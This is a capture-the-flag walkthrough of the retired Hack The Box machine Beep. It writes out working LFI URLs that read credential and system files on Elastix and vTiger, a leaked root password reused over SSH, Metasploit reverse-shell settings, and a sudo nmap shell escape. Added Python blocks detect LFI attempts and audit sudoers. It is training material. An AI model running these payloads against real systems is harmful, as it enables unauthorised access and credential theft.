Hack The Box (HTB) is an online platform that lets you test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulate real-world scenarios and some lean more towards a CTF style of challenge.
Note. Only write-ups of retired HTB machines are allowed.
Beep is described as having a very large list of running services, which can make it a bit challenging to find the correct entry method. The machine can be a little overwhelming for some, as there are many potential attack vectors.
We will use the following tools to pwn the box from a Kali Linux box:
nmap
zenmap
dirbuster
searchsploit
metasploit
Step 1 - Scanning the network
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.
This is one of the most important parts, as it determines what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as possible.
I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.
I use the following command to get a basic idea of what we are scanning:
nmap -sV -O -F --version-light 10.10.10.7
-sV: Probe open ports to determine service/version info
-O: Enable OS detection
-F: Fast mode - Scan fewer ports than the default scan
--version-light: Limit to most likely probes (intensity 2)
10.10.10.7: IP address of the Beep box
You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.
I use a different set of options to perform an intensive scan:
nmap -A -v 10.10.10.7
-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity level
10.10.10.7: IP address of the Beep box
If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.
We can see that there are 12 open ports:
Port 22. Secure Shell (SSH): secure logins, file transfers (scp, sftp) and port forwarding
Port 25. Simple Mail Transfer Protocol (SMTP), used for email routing between mail servers
Port 80. Hypertext Transfer Protocol (HTTP). Here it's an Apache httpd 2.2.3
Port 110. Post Office Protocol, version 3 (POP3)
Port 111. Open Network Computing Remote Procedure Call (ONC RPC, sometimes referred to as Sun RPC)
Port 143. Internet Message Access Protocol (IMAP), management of electronic mail messages on a server
Port 443. Hypertext Transfer Protocol over TLS/SSL (HTTPS)
Port 993. Internet Message Access Protocol over TLS/SSL (IMAPS)
Port 995. Post Office Protocol 3 over TLS/SSL (POP3S)
Port 3306. MySQL database system
Port 4445. I2P HTTP/S proxy
Port 10000. Webmin, Web-based Unix/Linux system administration tool (default port)
Nmap finds quite a long list of services. For now, Apache, which is running on ports 80 and 443, will be the primary target.
Step 2 - Enumerating the directories
Still in the scanning and reconnaissance phase, I now use DirBuster. DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.
You can launch DirBuster by typing this command in the terminal
dirbuster
or by searching for the application.
The application looks like this, where you can specify the target URL. In our case it will be https://10.10.10.7. You can select a file with the list of dirs/files by clicking the Browse button.
I use the directory-list-2.3-medium.txt wordlist for this search.
DirBuster finds a huge list of directories with several content management systems and open source applications. Among the results there are several applications with known vulnerabilities that can lead to a shell.
Step 3 - Visiting the website
Let's try port 80 and visit http://10.10.10.7
The website redirects to https://10.10.10.7 and we need to add a security exception for the site to continue.
We finally land on the website, which is an Elastix Login Portal. Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as call center software with predictive dialling.
An IP PBX ("Internet Protocol private branch exchange") is a system that connects telephone extensions to the public switched telephone network (PSTN) and provides internal communication for a business.
If you want to learn more about Elastix, you can have a look here.
I try the default credentials, but they don't seem to work:
Username: admin
Password: palosanto
Having a look at the source code doesn't help either.
I will use Searchsploit to check if there's any known vulnerability in Elastix. Searchsploit is a command line search tool for Exploit Database.
I use the following command
searchsploit elastix
We can see several vulnerabilities, but we will examine the 'graph.php' Local File Inclusion with this command
searchsploit -x 37637.pl
We have a summary of the exploit and the code.
The LFI exploit is the following
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS).
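As an added example (not code from the original write-up), the Python below runs a detection check over constructed Apache access-log lines whose request targets mirror the two LFI URLs on this page, and shows the kind of allowlist check on the current_language parameter that would stop the include. The IPs, timestamps, log entries and allowlist values are assumptions made up for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format log lines (made-up IPs and timestamps).
# The first two request targets mirror the LFI URLs discussed on this page.
SAMPLE_LOG = """\
10.10.14.10 - - [01/Jan/2020:10:00:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.10 - - [01/Jan/2020:10:00:05 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1480 "-" "Mozilla/5.0"
10.10.14.11 - - [01/Jan/2020:10:01:00 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.10.14.11 - - [01/Jan/2020:10:01:02 +0000] "GET /vtigercrm/index.php?module=Accounts&action=index HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def lfi_indicators(target):
    """Return the reasons a request target looks like an LFI attempt (empty list if clean)."""
    # Decode twice so double-encoded payloads (%252e%252e%252f) are caught as well.
    decoded = unquote(unquote(target))
    reasons = []
    if "\x00" in decoded:
        reasons.append("null byte (%00) used to truncate the included path")
    if re.search(r"\.\.[/\\]", decoded):
        reasons.append("directory traversal sequence")
    if re.search(r"/etc/(passwd|shadow|amportal\.conf|asterisk/)", decoded):
        reasons.append("reference to a sensitive system file")
    return reasons

def scan_access_log(text):
    """Parse log lines and return (client ip, script path, reasons) for suspicious requests."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = lfi_indicators(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), urlsplit(m.group("target")).path, reasons))
    return hits

# Assumed allowlist of language codes. The exploit URL shows graph.php building an
# include path from current_language, so anything outside this set is rejected.
ALLOWED_LANGUAGES = {"en_us", "es_es", "fr_fr"}

def safe_language(value, allowed=ALLOWED_LANGUAGES):
    """Hardened replacement for trusting current_language: allowlisted values only."""
    decoded = unquote(value)
    return decoded if decoded in allowed else "en_us"
```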
You can also check the Exploit Database to find the exploit.
You will get the same results as on the terminal. If you navigate to the 2.0 - 'graph.php' Local File Inclusion entry, you will have a description of the exploit.
If you remember from step 2, the directory enumeration flagged a vTiger CRM.
vTiger CRM is an integrated customer relationship management (CRM) application that can be used on an intranet or from the Internet using a browser. It is distributed under a free license.
If you want to learn more about vTiger CRM, you can have a look here.
You can also read more about the integration between Elastix and vTigerCRM here.
Step 4 - Trying the Elastix LFI exploit
Let's navigate to
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
If you can't read anything, you can prettify the output by viewing the page source.
I find a password jEhdIekWmdjE
If you remember from step 1, the nmap scan flagged port 22 as open. Let's try the newly found password on it.
Step 5 - Connecting to SSH
Let's connect over SSH with the following command
ssh root@10.10.10.7
I try the password and I'm in!
Step 6 - Looking for the root.txt flag
I can now look for the first flag, root.txt.
I use the following command to check who I am on this machine
whoami
I have root access to the machine. I got the power!
I use the following command to check where I am on the machine
pwd
I'm in /root and by doing
ls
I find the root.txt file! To read the content of the file I use the command
cat root.txt
Now that we have the root flag, let's find the user flag!
Step 7 - Looking for the user.txt flag
I need to navigate back to the home directory by doing
cd home
I then list all the files/folders and see there's a folder called fanis.
I navigate to this folder with
cd fanis
And when I list the files/folders, I can see the user.txt file!
To read the content of the file I use the command
cat user.txt
Congrats! You found both flags!
Variations for informational findings
Step 3b - Visiting the website
Let's navigate to
https://10.10.10.7/vtigercrm/
We can see the version of the application: vTiger CRM 5.1.0
I will use Searchsploit to check if there's any known vulnerability in vTigerCRM.
I use the following command
searchsploit vtiger
We can see several vulnerabilities. I examine the Local File Inclusion with this command
searchsploit -x 18770.txt
I have a summary of the exploit and the code.
The LFI exploit is the following
/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
You can also check the Exploit Database to find the exploit.
You will get the same results as on the terminal. If you navigate to the vTiger 5.1.0 - Local File Inclusion entry, you will have a description of the exploit.
Step 4b - Doing more recon around the vTiger Asterisk default credentials
Let's navigate to
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
If you can't read anything, you can prettify the output by viewing the page source.
I also do some research on default credentials for vTiger and find some documentation on installing the vTiger Asterisk Connector.
If we modify the previous URL to
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
and navigate to this page (viewing the page source to prettify the output),
I find a password jEhdIekWmdjE
You can continue to Step 5 from there.
Variations using Metasploit, meterpreter, nmap --interactive and Burp
Step 3c - Visiting the website
We know that the version of the application is vTiger CRM 5.1.0.
We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders.
I launch the Metasploit Framework on Kali and look for the command I should use to launch the exploit.
I find an interesting exploit module, number 3 in the results:
exploit/multi/http/vtiger_soap_upload
This is the description of the exploit:
vTiger CRM allows a user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2.
I use the following command to select the exploit
use exploit/multi/http/vtiger_soap_upload
I need to set up several options before launching the exploit.
I start by setting RHOSTS with the following command
set RHOSTS 10.10.10.7/32
I set SSL and RPORT with
set SSL true
and
set RPORT 443
I run the exploit, but this time I need to set the correct LHOST with
set LHOST 10.10.14.10
Here is a summary of all the commands
I check the options.
I run the exploit with the command
run
I get this error message
I set up the proxy with the following command
set proxies http:127.0.0.1:8080
I check the options again.
I run the exploit but I get a new error message.
I set it with this command
set ReverseAllowProxy true
I also need to set up Burp to proxy the exploit.
Burp Suite is a Java-based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps identify vulnerabilities and verify attack vectors that are affecting web applications.
You can learn more on the official website here.
Open Burp and set the target to the website in Target > Scope > Target Scope > Include in scope > edit
I run the exploit in Metasploit and go back to Burp. I can see Burp intercepted the request.
I set the Intercept option to off.
Back in Metasploit, I finally get a Meterpreter session.
From the Offensive Security website, we get this definition for Meterpreter:
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
You can read more about Meterpreter here.
Step 4c - Looking for the user.txt flag
I navigate to the root directory to find the home folder. I then move to the home directory with
cd home
You can list files/folders with
ls -la
I find a folder called fanis. Let's see what's inside with
cd fanis
I list all files/folders and I find the user.txt flag. To read the content of the file I use the command
cat user.txt
Now that we have the user flag, let's find the root flag!
Step 5c - Looking for the root.txt flag
I can't access the root folder, but I can create a shell with the command
shell
If I check who I am on the machine, I get
If you do
sudo -l
you can see many NOPASSWD commands which can lead us to getting root.
Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands. Since Nmap is in the list of binaries that are executed with root privileges, it is possible to use the interactive console to run a shell with the same privileges.
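As an added example that is not part of the original write-up, this Python audit parses a constructed sudoers sample and flags the NOPASSWD entries a defender would want to review: commands set to ALL, and binaries that can spawn a shell (here only nmap, the case described above). The users, hosts and paths in the sample are made up.

```python
import re

# Constructed sample of a sudoers file; users and paths are made up for this example.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults    requiretty
root    ALL=(ALL)       ALL
webuser ALL = NOPASSWD: /sbin/ifconfig, /usr/sbin/nmap, /bin/echo
ops     ALL = (root) NOPASSWD: /usr/bin/systemctl restart httpd
dev     ALL = (ALL) /usr/bin/less
"""

# Binaries whose sudo entry hands the caller a shell; nmap's --interactive mode
# (Nmap 2.02 to 5.21) is the case discussed on this page.
SHELL_ESCAPE_BINARIES = {"nmap"}

# user  host = (runas) TAG: cmd1, cmd2  (runas and tags are optional)
ENTRY_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def parse_sudoers(text):
    """Return one dict per user specification line (comments, Defaults and blanks are skipped)."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        entries.append({
            "user": m.group("user"),
            "runas": m.group("runas") or "root",   # sudo defaults to root when no runas is given
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return entries

def risky_entries(entries):
    """Return (user, command) for NOPASSWD entries that are ALL or run a shell-escape binary."""
    findings = []
    for e in entries:
        if not e["nopasswd"]:
            continue
        for cmd in e["commands"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES:
                findings.append((e["user"], cmd))
    return findings
```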
Let's try it with the following command
sudo nmap --interactive
The following command will give an elevated shell. You can read more on the Bourne shell here.
!sh
I check who I am on the machine, and I have root access.
I can now navigate to the root directory.
I find the root.txt.txt file!
To read the content of the file I use the command
cat root.txt
Congrats! You found both flags!
Please don't hesitate to comment, ask questions or share with your friends :)
You can see more of my articles here
You can follow me on Twitter or on LinkedIn
And don't forget to #GetSecure, #BeSecure & #StaySecure!
Other Hack The Box articles
Keep Calm and Hack The Box - Lame
Keep Calm and Hack The Box - Legacy
Keep Calm and Hack The Box - Devel
Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-beep/